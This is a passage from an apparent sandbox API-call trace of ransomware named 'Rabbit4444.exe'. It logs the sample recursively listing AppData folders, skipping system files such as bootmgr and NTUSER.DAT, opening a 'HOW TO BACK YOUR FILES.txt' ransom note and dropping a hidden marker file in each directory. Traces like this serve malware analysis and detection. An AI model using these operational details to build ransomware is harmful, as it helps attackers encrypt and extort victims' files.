nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.571] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.571] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.571] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0061.571] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0061.571] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0061.571] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee05db14, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee05db14, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee05db14, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0x0, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0061.571] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.571] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0061.571] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa2bc7808, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xa2bc7808, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xa2bc7808, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Connections", cAlternateFileName="CONNEC~1")) returned 1 [0061.571] lstrcmpiW (lpString1="Connections", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.571] lstrcmpiW (lpString1="Connections", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0061.571] lstrcmpiW (lpString1="Connections", lpString2="Rabbit4444.exe") returned -1 [0061.571] lstrcmpiW (lpString1="Connections", lpString2=".") returned 1 [0061.571] lstrcmpiW (lpString1="Connections", lpString2="..") returned 1 [0061.571] lstrcmpiW (lpString1="Connections", lpString2="windows") returned -1 [0061.571] lstrcmpiW (lpString1="Connections", lpString2="bootmgr") returned 1 [0061.571] lstrcmpiW (lpString1="Connections", lpString2="pagefile.sys") returned -1 [0061.572] lstrcmpiW (lpString1="Connections", lpString2="boot") returned 1 [0061.572] lstrcmpiW (lpString1="Connections", lpString2="ids.txt") returned -1 [0061.572] lstrcmpiW (lpString1="Connections", lpString2="NTUSER.DAT") returned -1 [0061.572] lstrcpyW (in: lpString1=0x11cebee, lpString2="Connections" | out: lpString1="Connections") returned="Connections" [0061.572] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122120 [0061.572] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x7e) returned 0x101518 [0061.572] RtlInterlockedPushEntrySList (in: ListHead=0x1220c8, ListEntry=0x122128 | out: ListHead=0x1220c8, ListEntry=0x122128) returned 0x1220a8 [0061.572] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa2bc7808, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xa2bc7808, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xa2bc7808, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Connections", cAlternateFileName="CONNEC~1")) returned 0 [0061.572] FindClose (in: hFindFile=0x102a10 | out: hFindFile=0x102a10) returned 1 [0061.572] lstrcpyW (in: lpString1=0x11cebee, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0061.572] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Network\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\network\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0061.574] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x29c [0061.574] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0061.574] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0061.574] CloseHandle (hObject=0x29c) returned 1 [0061.574] CloseHandle (hObject=0x2a0) returned 1 [0061.574] GetCurrentThreadId () returned 0x2d4 [0061.574] RtlInterlockedPopEntrySList (in: ListHead=0x1220c8 | out: ListHead=0x1220c8) returned 0x122128 [0061.574] lstrcpynW (in: lpString1=0x11ceb88, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Network\\Connections", iMaxLength=2048 | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Network\\Connections") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Network\\Connections" [0061.574] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101518 | out: hHeap=0xe0000) returned 1 [0061.574] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122120 | out: hHeap=0xe0000) returned 1 [0061.574] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Network\\Connections" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Network\\Connections") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Network\\Connections" [0061.575] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Network\\Connections", lpString2="\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Network\\Connections\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Network\\Connections\\" [0061.575] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Network\\Connections\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Network\\Connections\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Network\\Connections\\.BFC0E91B00AE8A0620D3" [0061.575] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Network\\Connections\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\network\\connections\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0061.576] WriteFile (in: hFile=0x2a0, lpBuffer=0x11cdb90*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x11ccb48, lpOverlapped=0x0 | out: lpBuffer=0x11cdb90*, lpNumberOfBytesWritten=0x11ccb48*=0x3d4, lpOverlapped=0x0) returned 1 [0061.578] FlushFileBuffers (hFile=0x2a0) returned 1 [0061.579] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Network\\Connections\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0061.580] CloseHandle (hObject=0x2a0) returned 1 [0061.580] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Network\\Connections") returned 62 [0061.580] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.580] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Network\\Connections\\*", lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa2bc7808, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xa2bc7808, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xee05db14, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0061.580] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.580] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.580] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0061.580] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0061.580] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa2bc7808, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xa2bc7808, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xee05db14, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.580] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.581] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.581] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0061.581] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0061.581] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0061.581] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee05db14, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee05db14, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee05db14, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0x0, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0061.581] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.581] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0061.581] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa2bc7808, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xa2bc7808, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xa2bc7808, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cm", cAlternateFileName="")) returned 1 [0061.581] lstrcmpiW (lpString1="Cm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.581] lstrcmpiW (lpString1="Cm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0061.581] lstrcmpiW (lpString1="Cm", lpString2="Rabbit4444.exe") returned -1 [0061.581] lstrcmpiW (lpString1="Cm", lpString2=".") returned 1 [0061.581] lstrcmpiW (lpString1="Cm", lpString2="..") returned 1 [0061.581] lstrcmpiW (lpString1="Cm", lpString2="windows") returned -1 [0061.581] lstrcmpiW (lpString1="Cm", lpString2="bootmgr") returned 1 [0061.581] lstrcmpiW (lpString1="Cm", lpString2="pagefile.sys") returned -1 [0061.581] lstrcmpiW (lpString1="Cm", lpString2="boot") returned 1 [0061.581] lstrcmpiW (lpString1="Cm", lpString2="ids.txt") returned -1 [0061.581] lstrcmpiW (lpString1="Cm", lpString2="NTUSER.DAT") returned -1 [0061.581] lstrcpyW (in: lpString1=0x11cec06, lpString2="Cm" | out: lpString1="Cm") returned="Cm" [0061.581] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122260 [0061.581] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x84) returned 0x106420 [0061.581] RtlInterlockedPushEntrySList (in: ListHead=0x1220c8, ListEntry=0x122268 | out: ListHead=0x1220c8, ListEntry=0x122268) returned 0x1220a8 [0061.581] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa2bc7808, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xa2bc7808, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xa2bc7808, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_hiddencm", cAlternateFileName="_HIDDE~1")) returned 1 [0061.581] lstrcmpiW (lpString1="_hiddencm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.581] lstrcmpiW (lpString1="_hiddencm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0061.581] lstrcmpiW (lpString1="_hiddencm", lpString2="Rabbit4444.exe") returned -1 [0061.581] lstrcmpiW (lpString1="_hiddencm", lpString2=".") returned 1 [0061.581] lstrcmpiW (lpString1="_hiddencm", lpString2="..") returned 1 [0061.581] lstrcmpiW (lpString1="_hiddencm", lpString2="windows") returned -1 [0061.581] lstrcmpiW (lpString1="_hiddencm", lpString2="bootmgr") returned -1 [0061.581] lstrcmpiW (lpString1="_hiddencm", lpString2="pagefile.sys") returned -1 [0061.581] lstrcmpiW (lpString1="_hiddencm", lpString2="boot") returned -1 [0061.581] lstrcmpiW (lpString1="_hiddencm", lpString2="ids.txt") returned -1 [0061.581] lstrcmpiW (lpString1="_hiddencm", lpString2="NTUSER.DAT") returned -1 [0061.582] lstrcpyW (in: lpString1=0x11cec06, lpString2="_hiddencm" | out: lpString1="_hiddencm") returned="_hiddencm" [0061.582] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1222e0 [0061.582] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x92) returned 0x113b98 [0061.582] RtlInterlockedPushEntrySList (in: ListHead=0x1220c8, ListEntry=0x1222e8 | out: ListHead=0x1220c8, ListEntry=0x1222e8) returned 0x122268 [0061.582] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa2bc7808, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xa2bc7808, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xa2bc7808, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_hiddencm", cAlternateFileName="_HIDDE~1")) returned 0 [0061.582] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0061.582] lstrcpyW (in: lpString1=0x11cec06, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0061.582] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Network\\Connections\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\network\\connections\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0061.583] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x29c [0061.583] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0061.584] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0061.584] CloseHandle (hObject=0x29c) returned 1 [0061.584] CloseHandle (hObject=0x2a0) returned 1 [0061.584] GetCurrentThreadId () returned 0x2d4 [0061.584] RtlInterlockedPopEntrySList (in: ListHead=0x1220c8 | out: ListHead=0x1220c8) returned 0x1222e8 [0061.584] lstrcpynW (in: lpString1=0x11ceb88, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Network\\Connections\\_hiddencm", iMaxLength=2048 | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Network\\Connections\\_hiddencm") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Network\\Connections\\_hiddencm" [0061.584] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x113b98 | out: hHeap=0xe0000) returned 1 [0061.584] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1222e0 | out: hHeap=0xe0000) returned 1 [0061.584] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Network\\Connections\\_hiddencm" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Network\\Connections\\_hiddencm") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Network\\Connections\\_hiddencm" [0061.584] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Network\\Connections\\_hiddencm", lpString2="\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Network\\Connections\\_hiddencm\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Network\\Connections\\_hiddencm\\" [0061.584] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Network\\Connections\\_hiddencm\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Network\\Connections\\_hiddencm\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Network\\Connections\\_hiddencm\\.BFC0E91B00AE8A0620D3" [0061.584] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Network\\Connections\\_hiddencm\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\network\\connections\\_hiddencm\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0061.587] WriteFile (in: hFile=0x2a0, lpBuffer=0x11cdb90*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x11ccb48, lpOverlapped=0x0 | out: lpBuffer=0x11cdb90*, lpNumberOfBytesWritten=0x11ccb48*=0x3d4, lpOverlapped=0x0) returned 1 [0061.589] FlushFileBuffers (hFile=0x2a0) returned 1 [0061.590] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Network\\Connections\\_hiddencm\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0061.591] CloseHandle (hObject=0x2a0) returned 1 [0061.591] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Network\\Connections\\_hiddencm") returned 72 [0061.591] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.591] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Network\\Connections\\_hiddencm\\*", lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa2bc7808, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xa2bc7808, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xee083ca6, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102750 [0061.591] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.591] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.591] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0061.591] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0061.591] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa2bc7808, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xa2bc7808, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xee083ca6, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.591] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.591] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.591] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0061.591] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0061.592] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0061.592] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee083ca6, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee083ca6, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee083ca6, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0x0, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0061.592] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.592] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0061.592] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee083ca6, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee083ca6, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee083ca6, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0x0, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0061.592] FindClose (in: hFindFile=0x102750 | out: hFindFile=0x102750) returned 1 [0061.592] lstrcpyW (in: lpString1=0x11cec1a, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0061.592] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Network\\Connections\\_hiddencm\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\network\\connections\\_hiddencm\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0061.592] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x29c [0061.592] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0061.593] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0061.593] CloseHandle (hObject=0x29c) returned 1 [0061.593] CloseHandle (hObject=0x2a0) returned 1 [0061.593] GetCurrentThreadId () returned 0x2d4 [0061.593] RtlInterlockedPopEntrySList (in: ListHead=0x1220c8 | out: ListHead=0x1220c8) returned 0x122268 [0061.593] lstrcpynW (in: lpString1=0x11ceb88, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Cm", iMaxLength=2048 | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Cm") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Cm" [0061.593] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106420 | out: hHeap=0xe0000) returned 1 [0061.593] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122260 | out: hHeap=0xe0000) returned 1 [0061.593] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Cm" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Cm") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Cm" [0061.593] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Cm", lpString2="\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Cm\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Cm\\" [0061.593] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Cm\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Cm\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Cm\\.BFC0E91B00AE8A0620D3" [0061.593] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Cm\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\network\\connections\\cm\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0061.594] WriteFile (in: hFile=0x2a0, lpBuffer=0x11cdb90*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x11ccb48, lpOverlapped=0x0 | out: lpBuffer=0x11cdb90*, lpNumberOfBytesWritten=0x11ccb48*=0x3d4, lpOverlapped=0x0) returned 1 [0061.598] FlushFileBuffers (hFile=0x2a0) returned 1 [0061.598] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Cm\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0061.599] CloseHandle (hObject=0x2a0) returned 1 [0061.599] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Cm") returned 65 [0061.599] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.599] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Cm\\*", lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa2bc7808, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xa2bc7808, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xee083ca6, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102750 [0061.599] 